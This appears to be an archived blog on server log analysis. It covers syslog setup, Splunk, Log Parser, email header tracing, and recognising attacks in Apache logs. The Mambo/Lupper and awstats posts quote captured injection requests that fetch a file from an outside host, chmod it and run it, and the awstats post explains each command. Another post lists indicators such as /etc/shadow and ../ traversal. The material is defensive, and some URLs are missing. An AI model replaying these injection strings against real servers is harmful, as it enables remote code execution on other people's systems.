Thursday, January 11, 2007

More log analysis posts to come

After a long break, I will be posting more about log analysis here again. Hopefully some readers will find my posts about analyzing logs useful. Next up will be Ethereal, tcpdump and some other network packet capturing tools. Analyzing network traffic can be a handful, but there are some great tools and scripts out there to help us. With Ethereal you can do pretty much everything with your collected network data logs. Lots of handy filters and custom colouring of the different protocols make it very readable. So stay tuned if you are into logs.

Tuesday, April 25, 2006

Web Server Log Analysis

Tracking down malicious activity in web server log files is rather easy, if you have configured your web server correctly. That means configuring it to audit web server traffic: IP address, date, kind of HTTP request, which page your web server served and so on. If you have any experience setting up an Apache server, you should have seen the appropriate logs under your /var directory. The exact log directory differs between operating systems and distributions, of course.

What to look for?

Some examples of suspicious entries:

  • Single ticks (') are used in SQL injection attacks.
  • ../ sequences indicate directory traversal attempts, often in different encodings.
  • /etc/shadow is nothing you want to see a 200 response on (200 means a successful GET request).
  • All kinds of shell paths, on Unix and on Windows alike.
  • Pipes (|) and semicolons, used to chain commands together.
  • ASCII control characters.
  • Lots of 404 or 500 responses from your web server, which might indicate a vulnerability scan of your server.
  • Buffer overflow attempts, often padded with long runs of repeated characters (also used as an anti-IDS method).

From here you can use grep, perl, python or shell scripts to process the information in your logs.

Syslog, Setting Up Your Own Syslog Server

A simple guide to setting up your own syslog server.

Building your own Syslog Environment.

Ever wanted to collect all those local system logs in one
place? Setting up your Unix/Linux/Windows machines to log
to one dedicated syslog server is actually very easy.

#### Setting up the Syslog Server. ####

First out, you will need a simple machine, preferably running
some Unix dialect, with syslog or syslog-ng installed.

The syslog daemon is most likely running on your system already,
but to make sure, check for its presence with ps -ef | grep syslogd:

# ps -ef | grep syslogd
root 2153 1 0 Apr19 ? 00:00:00 syslogd -m 0
salt 15126 15125 0 15:29 pts/0 00:00:00 /bin/bash -c ps -ef| grep syslogd

If syslogd is running and you want to be able to receive log messages from
the network, you will have to run syslogd with the -r option. Edit the /etc/sysconfig/syslog
file to make the change permanent.

# vi /etc/sysconfig/syslog

# Options to syslogd
# -m 0 disables 'MARK' messages.
# -r enables logging from remote machines
# -x disables DNS lookups on messages recieved with -r
# See syslogd(8) for more details
# Options to klogd
# -2 prints all kernel oops messages twice; once for klogd to decode, and
# once for processing with 'ksymoops'
# -x disables all klogd processing of oops messages entirely
# See klogd(8) for more details


Add the -r option on line 6 after SYSLOGD_OPTIONS="-m 0" so it says SYSLOGD_OPTIONS="-m 0 -r"
Restart your syslog server.

# /etc/init.d/syslogd restart

Your syslog server should now be able to collect those network logs.

#### Edit your client to send log data to the syslog server ####

After checking for syslogd on the client, edit the /etc/syslog.conf file.
Just add @syslogserver after *.* for example, and restart your syslogd daemon.
Don't bother about the wildcard *.* for now, you can tune that later on.

Now as user root.

# vi /etc/syslog.conf

# Log all kernel messages to the console.
# Logging much else clutters up the screen.
kern.* /dev/console

# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
# *.info;mail.none;authpriv.none;cron.none /var/log/messages
*.* @syslogserver <-- edit this to your syslog server's address

# The authpriv file has restricted access.
authpriv.* /var/log/secure

# Log all the mail messages in one place.
mail.* -/var/log/maillog

# Log cron stuff
cron.* /var/log/cron

# Everybody gets emergency messages
*.emerg *

# Save news errors of level crit and higher in a special file.
uucp,news.crit /var/log/spooler

# Save boot messages also to boot.log
local7.* /var/log/boot.log

After adding the *.* @syslogserver line, let's see what kind of logs we get.
But don't forget to restart your syslog daemon first. It will need to re-read
your syslog.conf file.

# /etc/init.d/syslogd restart

You should now be able to see incoming log data on your syslog server:
# tail -f /var/log/messages
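Once entries start arriving, it is handy to see which hosts are actually logging to the server. Here is a small awk sketch, run against made-up /var/log/messages lines; in the standard syslog line format, the sending hostname is the fourth field.

```shell
# Made-up lines in syslog format: "Mon DD HH:MM:SS hostname program[pid]: message"
cat > /tmp/sample_messages <<'EOF'
Apr 19 15:29:01 webserver01 sshd[2411]: Accepted password for salt from port 4242 ssh2
Apr 19 15:29:05 webserver01 su(pam_unix)[2450]: session opened for user root by salt(uid=500)
Apr 19 15:30:12 mailserver01 sendmail[889]: k3JDUCq1000889: from=root, size=1042
EOF

# Count log lines per sending host:
awk '{hosts[$4]++} END {for (h in hosts) print h, hosts[h]}' /tmp/sample_messages
```

From a client you can generate a test entry with logger, e.g. logger -t test "hello syslog server", and watch it show up in the tail -f above.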


Thursday, March 09, 2006

Buffer Overflow attempt fp30reg.dll apache log. Old Hack, same logs

During my years as a Unix system administrator, I have had my share of logs and
log analysis, especially from staring at web server and mail server log entries.
These poor servers are usually in a DMZ or at the front of the line, right before
the internet, and totally exposed.

Of all the logs you go through, most contain ordinary GET /something requests,
with a web server reply of 200. So when you see a SEARCH in your access logs, you kind
of raise an eyebrow. The log below shows an automated attempt, from an infected host.

The attack code (a buffer overflow in this and many other cases) has the
purpose of doing the "break in". The \xc9 bytes are NOPs (no operation),
padding the attempt to overflow fp30reg.dll.

What's most scary about this attack is that it's still in use, meaning there are
vulnerable systems out there, even though the vulnerability was announced as
Critical by Microsoft back in Nov 2003!! Only G*d knows how long the black hats
had the code before Microsoft.

- - [09/Mar/2006:16:54:38 +0100] "SEARCH ..." 414 339 "-" "-"
- - [09/Mar/2006:16:54:38 +0100] "GET / HTTP/1.0" 200 251213 "-" "-"
- - [09/Mar/2006:16:55:09 +0100] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 316 "-" "-"

(The body of the SEARCH request, a long \xc9 sled, is truncated here.)

This attack code is trying to exploit, with a buffer overflow, a known vulnerability
in Microsoft IIS running FrontPage extensions,
and it is totally harmless to Unix systems running Apache.

Monday, March 06, 2006

Dissecting Email Headers, Part I

This is just a simple little guide. Nothing fancy; I'm not going to dig into all the MTA/SMTP and mail routing, just show you one example of the traces SMTP traffic leaves behind.

Have you ever wondered where you can find the source ip address in an email?
Here is a mini howto in dissecting mail headers.

In Gmail, you can open up the headers by clicking "More options" in an opened email, and then
"Show original". This will open a new browser window, with your email in pure 7-bit ASCII.

Email headers are like the front of an envelope or the back of a postcard.
The "stamps" are made by the SMTP servers involved in the transmission of the email.
The header shows the stamps in order from the bottom up.

Working your way from the bottom (or middle) of the email header towards the top gives you the path taken from the source to the destination. Finding the source IP address is usually easy. Just find the field that says X-Originating-IP or something similar; it sometimes differs between mail servers. There is however a standard for this in RFC 822.
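If you save the raw message to a file, grep can pull that field out for you. A small sketch; the header fragment below is made up, with a documentation address ( standing in for a real sender.

```shell
# A made-up fragment of a raw email header:
cat > /tmp/sample_mail.txt <<'EOF'
Received: from by with HTTP;
Sat, 04 Mar 2006 19:20:40 GMT
X-Originating-IP: []
From: "Mail Senderson"
Subject: SMTP message
EOF

# Grab the originating ip; -i because header capitalization varies:
grep -i '^x-originating-ip:' /tmp/sample_mail.txt | tr -d '[]' | awk '{print $2}'
```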

Dissecting Email Headers, part II

Part II

Received-SPF: pass ( domain of designates as permitted sender)
Received: from mail pickup service by with Microsoft SMTPSVC;
Sat, 4 Mar 2006 11:20:43 -0800
Received: from by with HTTP;
Sat, 04 Mar 2006 19:20:40 GMT
X-Originating-IP: [X.236.92.250] <- Senders ip address
X-Originating-Email: []
X-Sender: <- Here you could see something like "Outlook, Eudora, Evolution" etc.
In-Reply-To: <>
From: "Mail Senderson"
Subject:SMTP message
Date: Sat, 04 Mar 2006 19:20:40 +0000
Mime-Version: 1.0
Content-Type: text/html; format=flowed
X-OriginalArrivalTime: 04 Mar 2006 19:20:43.0290 (UTC) FILETIME=[BB2877A0:01C63FC0]

Message body goes here................

Dissecting Email Headers, part III

Part III
Definitions and Glossary:

SMTP: Simple Mail Transfer Protocol (RFC 821). For transmission of mail across the internet.

MIME: Multipurpose Internet Mail Extensions, an Internet standard specifying message formats for transmission of different types of data by electronic mail.

SPF: technology designed to make the sending of spam/virus messages with faked domain names more difficult. It is like a "reverse MX" DNS record which identifies a domain name with the servers from which that domain sends its messages.

Message ID: the unique id every email is given by the receiving MTA. On Unix systems, usually based on Unix time.

MTA: Mail Transport/Transfer Agent (SMTP). Mail routing and relaying.

Ok, so you found the X-Originating-IP. Now what?
Well, if you are curious, you can traceroute the IP address and check the route packets take from
the sending email system to the receiving email system. You can do a whois on the IP address to see who owns that particular address range. Or if it is an abuse case, you can copy the header and mail it to the sender's mail domain with a complaint. The complaint should go to the domain's standard abuse mailbox; if that address bounces, try the postmaster address.

Remember, if the mail is of the abuse character, you should be aware that the X-Originating-IP address is most likely faked/spoofed.

Wednesday, March 01, 2006

Log analysis: xmlrpc xmlsrv 404 requests, Linux worm

A not too uncommon entry in my Apache access log files. Exploit code has been out in the wild for
quite some time, but the world of security patching still isn't keeping up with the constant releases of malware.

This is a no-brainer. Host "infected-server-host" (I changed the IP to protect the innocent) is
running automated scripts (they might be manually operated as well) against possible targets vulnerable to known xmlsrv, xmlrpc and Mambo attacks. The first three lines show something interesting.

infected-server-host - - [23/Feb/2006:03:09:05 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS%20XXX.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo| HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:07 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
infected-server-host - - [23/Feb/2006:03:09:08 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
infected-server-host - - [23/Feb/2006:03:09:13 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:14 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:16 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:17 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:19 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:21 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
infected-server-host - - [23/Feb/2006:03:09:22 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
infected-server-host - - [23/Feb/2006:03:09:23 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
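A quick way to summarize probes like these is to count xmlrpc.php requests per source host. The log lines below are shortened, made-up stand-ins for the excerpt above.

```shell
# Shortened, made-up access_log entries in the style of the excerpt above.
cat > /tmp/sample_access.log <<'EOF'
infected-server-host - - [23/Feb/2006:03:09:07 +0100] "POST /xmlrpc.php HTTP/1.1" 404 297 "-" "Mozilla/4.0"
infected-server-host - - [23/Feb/2006:03:09:08 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0"
infected-server-host - - [23/Feb/2006:03:09:13 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0" - - [21/Nov/2005:13:23:18 +0100] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
EOF

# Probing hosts with attempt counts, busiest first:
grep 'xmlrpc\.php' /tmp/sample_access.log | awk '{print $1}' | sort | uniq -c | sort -rn
```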

This worm is also known as
Linux/Lupper.worm.a [McAfee], Linux/Lupper.A [Computer Associates], Linux/Lupper.B [Computer Associates], [Kaspersky], Exploit.Linux.Lupii [ClamAV], ELF_LUPPER.A [Trend Micro].

The worm is trying to use the XML-RPC for PHP Remote Code Injection Vulnerability.
Vulnerable systems and complete information can be found at Security Focus:
XOOPS, WordPress, Ubuntu, Red Hat, SuSE.

Countermeasures: Upgrades are available for most applications that use XML-RPC. Check the application's official site for upgrades and patches.


Tuesday, February 07, 2006

Known awstats ( Vulnerability Logs - Update

The last two weeks my httpd/apache access_log has been showered with GET requests trying to exploit a known vulnerability in awstats 6.3 and prior. This has been resolved in version 6.5 of awstats, so upgrade.

Awstats is a great log tool that generates advanced graphical statistics from your server logs. I have used it on many of my sites to generate graphical statistics.

However, a vulnerability has been identified in awstats (< 6.3), which could be exploited by attackers to execute arbitrary code and compromise a vulnerable system. The problem results from an input validation error in the "" file when handling the "configdir" parameter, which can be exploited by attackers to execute arbitrary commands using "|" characters.

So if you use awstats on your web server and find these kinds of logs in your access_log, you
should take action and consider that your machine may be compromised. Upgrade to awstats version 6.5 immediately or asap. Version 6.5 is available for download.

Typical exploit attempt for

GET /awstats/|echo;echo%20YYY;cd%20%2ftmp%3bw
echo| HTTP/1.1

Request Method: GET
Request URI: /awstats/|echo;echo%20YYY;cd%20%2ftmp%3b

Explanation: If you are familiar with Unix/Linux you should be able to pick out the commands that this string contains. First out, after the GET request, is the path to awstats ( is a CGI script written in Perl, which can be used from the command line too).

So after|echo; you see echo%20YYY, then cd (change directory in Unix) to /tmp. Then wget (a utility for non-interactive download of files from the Web; it supports the HTTP, HTTPS and FTP protocols, as well as retrieval through HTTP proxies) fetches a file, and the change mode command chmod makes it executable.
chmod listen (file) (listen file = netcat?) I will have to find out and get back on that one.
So check for an update in this posting if you are interested.


Friday, February 03, 2006

Log parser review. The "forgotten" power tool?

Logparser 2.0.

Log Parser 2.0 has been around since 2002, but you hardly ever hear anyone talking about it. It is a great tool for parsing logs,
if you get to know it. Log Parser comes with a huge number of options and flags and, as far as I know, no GUI (graphical user interface), which might scare off some administrators. I am from the world of Unix, and a command line freak, so the CLI that Log Parser
offers is just perfect. (No CLI vs GUI flames, please.)

As this is a blog, I will not go into every detail about Log Parser; you will have to explore it yourself. I do recommend it: it is really a power tool for Windows administrators and expert users, with the ability to give you a good overview of all the logs your machines
are producing. You could write batch jobs to parse your Event Log, the Registry, the file system and Active Directory®,
and have the results mailed to you every morning. Would not that be nice? The results of your query can also be custom-formatted in text based output, or they can be persisted to more specialty targets like SQL, SYSLOG, or a chart.

With some tweaking, you could make your log queries and results "management"-understandable, and have the output of your
log analysis in a human readable format.

Not to scare you off Log Parser, but here are all the flags you will be able to use:

C:\Program\Log Parser>logparser

Microsoft (R) Log Parser Version 2.0
Copyright (C) 2002 Microsoft Corporation. All rights reserved.

Usage: LogParser [-i:<input_format>] [-o:<output_format>]
<SQL query> | file:<query_filename>
[<input_format_options>] [<output_format_options>]
[-q[:ON|OFF]] [-e:<max_errors>] [-iw[:ON|OFF]]

LogParser -c -i:<input_format> -o:<output_format>
<from_entity> <into_entity>
[<where_clause>] [-multisite[:ON|OFF]]
[-q[:ON|OFF]] [-e:<max_errors>] [-iw[:ON|OFF]]

-i:<input_format> : one of ... FS (if omitted, will guess from the FROM clause)
-o:<output_format> : one of CSV, XML, NAT, W3C, IIS, SQL, TPL, NULL (if
omitted, will guess from the TO clause)
-q[:ON|OFF] : quiet mode; default is OFF
-e:<max_errors> : max # of parse errors before aborting; default is -1
(ignore all)
-iw[:ON|OFF] : ignore warnings; default is OFF
-stats[:ON|OFF] : dump stats after executing query; default is ON
-c : use built-in conversion query
-multisite[:ON|OFF] : send BIN conversion output to multiple files
depending on the SiteID value; default is OFF

Examples:
LogParser "SELECT date, REVERSEDNS(c-ip) AS Client, COUNT(*) FROM file.log
WHERE sc-status<>200 GROUP BY date, Client" -e:10
LogParser -c -i:BIN -o:W3C file1.log file2.log "ComputerName IS NOT NULL"

-h 1 : SQL Language Grammar
-h 2 [<function_name>] : Functions Syntax
-h 3 : Example queries
-h -i:<input_format> : Help on <input_format>
-h -o:<output_format> : Help on <output_format>
-h -c : Conversion help

"Most software is designed to accomplish a limited number of specific tasks. Log Parser is different... the number of ways it can be used is limited only by the needs and imagination of the user. The world is your database with Log Parser."

Wednesday, February 01, 2006

Online pen-test tools, How secure are you and your clients/servers?

Online pen-test tools

traceroute - print the route packets take to a network host.
It uses the IP protocol's time to live (TTL) field and attempts to elicit an ICMP TIME_EXCEEDED response from each gateway along the path to some host.
(It shows all the router hops between host A and host B. Useful for troubleshooting network
problems, mapping network infrastructure etc.) On Unix/Linux systems you can use traceroute with the -I flag, which makes it use ICMP. Traceroute uses UDP packets by default, and as UDP (User Datagram Protocol) is a stateless protocol, it gets low priority from routers. This means that if the load between
two networks is heavy, the routers will drop the traceroute UDP packets with ease.

[salt@mimir ~]$ /usr/sbin/traceroute -I host_to_traceroute Version 1.4a12

Usage: traceroute [-dFInrvx] [-g gateway] [-i iface] [-f first_ttl]

[-m max_ttl] [ -p port] [-q nqueries] [-s src_addr] [-t tos]

[-w waittime] [-z pausemsecs] host [packetlen]

Online Traceroute can be found here

Online Perimeter and Content Scanning
Linux Sec Dot Net.

Lots of online tools. Use with care; abuse is not and will not be tolerated.

Online port scanners, nessus scanners, dns scanners, apache scanners, firewall testers, open relay tests,
virus scanners and much more..


Wednesday, January 25, 2006

Fwanalog: analyse your firewall logs now!

I tried out fwanalog some time ago, and I am really impressed by the work the coder has done with shell scripts. If you consider the commercial software CheckPoint sells (Reporter), you will
find this tool a lot more useful. So start parsing your firewall logs today!

fwanalog is a shell script that parses and summarizes firewall logfiles. It currently (version 0.6.9) understands logs from ipf (tested with OpenBSD 2.8's and 2.9's ipf, also FreeBSD, NetBSD and Solaris 8 with ipf (+ ipfw on FreeBSD)), OpenBSD 3.x pf, Linux 2.2 ipchains, Linux 2.4 iptables, some ZyXEL/NetGear routers and Cisco PIX, Watchguard Firebox, Firewall-One (not NG!), FreeBSD ipfw and Sonicwall firewalls.

(You might need to change the shebang line to bash on non-free Unixes that don't ship with a powerful enough /bin/sh.)

It can be easily extended for other logfile formats, all it takes is editing two regular expressions.

fwanalog uses the excellent log analysis program Analog (also free software) to create its reports. It does so by converting the firewall log into a fake web server log and calling Analog with a modified configuration.


Thursday, January 12, 2006

A heavy flaw in WMF has been reported.

The WMF vulnerability uses images (WMF images) to execute arbitrary
code. It will execute just by viewing the image. In most cases, you
don't have to click anything. Even images stored on your system may cause
the exploit to be triggered if they are indexed by some indexing
software. Viewing a directory in Explorer with 'Icon size' images will
cause the exploit to be triggered as well. Microsoft announced that an
official patch will not be available before January 10th 2006 (the next
regular update cycle). But there are several workarounds available. This
is one of them. I haven't tested this hotfix, so I can't guarantee
anything, but the guys at SANS usually know what they're doing.

MSI WMF Hotfix link

More information about the WMF flaw can be found at


Splunk review (free version)

I tried out the Splunk server (Red Hat Enterprise Server 4, kernel 2.6.9-5.EL),
Splunk Server version 1.1 build 3772 to be exact,
and this first review concerns installation, look and feel.

I am an experienced Unix/Linux sysadmin, but the installation was just a kick, and the installation script gave me yes or no options, which made it extremely easy to install. Just chmod +x splunk-Server-1.1-linux-installer.bin so it's executable and start the install phase with # ./splunk-Server-1.1-linux-installer.bin.

Starting the Splunk server was just as easy. Run the splunk Bourne shell script as follows:

[root@mimir splunk]# /opt/splunk/bin/splunk start
== Checking prerequisites...
Version is Splunk Server
Checking http port [8000]: open
Checking https port [8001]: open
Checking mgmt port [8089]: open
Checking search port [9099]: open
== All checks passed
Starting splunkd [ OK ]
Starting splunkSearch [ OK ]

You might have a problem with the ports, as the local firewall you have enabled (yes, a must have) will not let you connect to these ports by default. If you're connecting through localhost, this shouldn't be much of a problem.

Check out netfilter/iptables for localhost access otherwise. You are also able to choose other ports that may suit your firewall needs better. Just be sure they are not taken by another service.

As I am an IT security freak, I don't want any ports bound to my external (internet-facing) interface if avoidable, so I would recommend defending these ports with appropriate firewall rules before playing around with the web interface.

So don't allow any internet sources to connect to ports 8000/tcp, 8001/tcp, 8089/tcp and 9099/tcp. You might need to open them up later, for communication with other syslog facilities. But wait until you've become familiar with Splunk and how it works.
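As a sketch of what that could look like with netfilter/iptables, the rules below restrict Splunk's four ports to the loopback interface. This assumes a default-accept INPUT chain; adapt it to your own ruleset before using it.

```shell
# Allow Splunk's ports from the loopback interface only, drop everyone else.
# Assumes iptables and a default-accept INPUT chain; adapt to your own ruleset.
for port in 8000 8001 8089 9099; do
    iptables -A INPUT -i lo -p tcp --dport "$port" -j ACCEPT
    iptables -A INPUT -p tcp --dport "$port" -j DROP
done
```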

Connecting to the web interface is easy: just add port 8000 to your URL, and you will land right on the Splunk user interface. You will be greeted with "Welcome to Splunk" and see some configuration options. So fire up Firefox/IE against yourhost:8000 and browse.

To get started, click on Index a file now, and upload a file in syslog format, e.g. /var/log/messages. The file will be indexed and viewable in a second. That depends on the size and CPU power of course, but 40 MB of files was done in a flash on my workstation.

From here on, you can browse all your log messages in a beautifully structured and intelligent way. Click on the file you let Splunk process and have a look. Mmmm, a sysadmin's wet dream.

Ok, that's all for now. I will post part II later this week, when I have had time to try it out with searches, tags and some of the advanced features it offers. It sure looks promising.
I will also try and see if I can configure snort data to be processed as well.

So for now, keep your /var/log in shape, and don't throw away any UDP with destination port 514.
Splunk Official Website



Tuesday, January 03, 2006

Log parsers

Here you will find links to the log parsers I've been using through the years. I will drop a few betas of my own log parsing/analyzing tools asap. Some methods for forensics and intrusion detection will also be covered. This is a huge topic, so I can't post everything I've read or know, but you'll get logs from intrusion attempts and their likes, that I can guarantee.

Ok, may the code be stable and the syslog up and running. Don't forget to make sure that your system's wtmp is in place. LoL


Analyzing logs. Tools and methods.

About time that I check out Splunk and their self-proclaimed awesome log tool. It sure looks promising, like a wet dream for all system administrators.

Excerpt from Splunk's website.

What Splunk can do for you?

  • System administrators can find the root cause of problems quickly and locate latent systems issues before they cause downtime.
  • Developers can debug interactions among multiple tiers and components in the code-test cycle, the migration from development to production or during production escalations.
  • Help desk and support teams can investigate reported incidents and alerts right away without having to reproduce the problem or call in senior analysts or developers.
So right now, I will kickstart an installation of Splunk and check out all the nitty gritty techie stuff.
Next up is syslog next generation, aka syslog-ng. The classic Unix syslog will of course be covered too, but at a later time.

Parse your logs with care, and always make backups before you sed/awk the cr.p out of them.



Notes: analyse, (analyze US)

Wednesday, December 28, 2005

http access_log analysis, part 1

In part 1 of log analysis I will provide you with some useful http logs, try to analyse them, and if possible correlate them.

First of all, the logs that I provide are all from Linux systems, but the logs should be similar if you're running Apache on a Windows box. (Which you should try to avoid if possible.)

The logs from this site, which has a few hundred unique visitors a month and is not loaded with lots of traffic, are quite easy to go through manually and with some small scripts. This is to get a better understanding of the logging format and how you can learn to identify malicious traffic that your httpd daemon logged.

It's very common to find entries like these in your httpd access log: - - [21/Nov/2005:13:23:18 +0100] "GET / HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.12) Gecko/20050919 Firefox/1.0.7" - - [21/Nov/2005:13:23:18 +0100] "GET /favicon.ico HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.12) Gecko/20050919 Firefox/1.0.7" - - [21/Nov/2005:13:23:45 +0100] "GET / HTTP/1.1" 403 63 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.12) Gecko/20050919 Firefox/1.0.7" - - [21/Nov/2005:13:23:46 +0100] "GET /favicon.ico HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"

These are ordinary HTTP GET requests and should be treated as vanilla traffic. They are useful for statistics and info gathering about your visitors. There is a bunch of good web analysis tools out there that can easily accomplish the task of presenting the log data in a more human readable form.
Webalizer is one such tool, and it's installed by default in many Linux distributions along with Apache.
Usually you can find Webalizer's output under /var/www/usage or similar.

The cron job (for Webalizer) is found under /etc/cron.daily/00webalizer. The script looks like this:

#! /bin/bash
# update access statistics for the web site

if [ -s /var/log/httpd/access_log ] ; then
    /usr/bin/webalizer
fi

exit 0

A simple bash script that runs the webalizer binary (/usr/bin/webalizer), which parses the access_log file under /var/log/httpd/. So remember to change the path or the name of the access_log file if you don't use the default locations.

End of part I

To be continued ....

Monday, December 12, 2005

Friday, December 09, 2005

About Loganalysis

This blog is going to give you a helping hand in analysing lots of different logs from all kinds of platforms.
I will provide a "submit your log" script soon, with which you can submit logs you know about and want to
share with the rest of the internet.

Best Regards,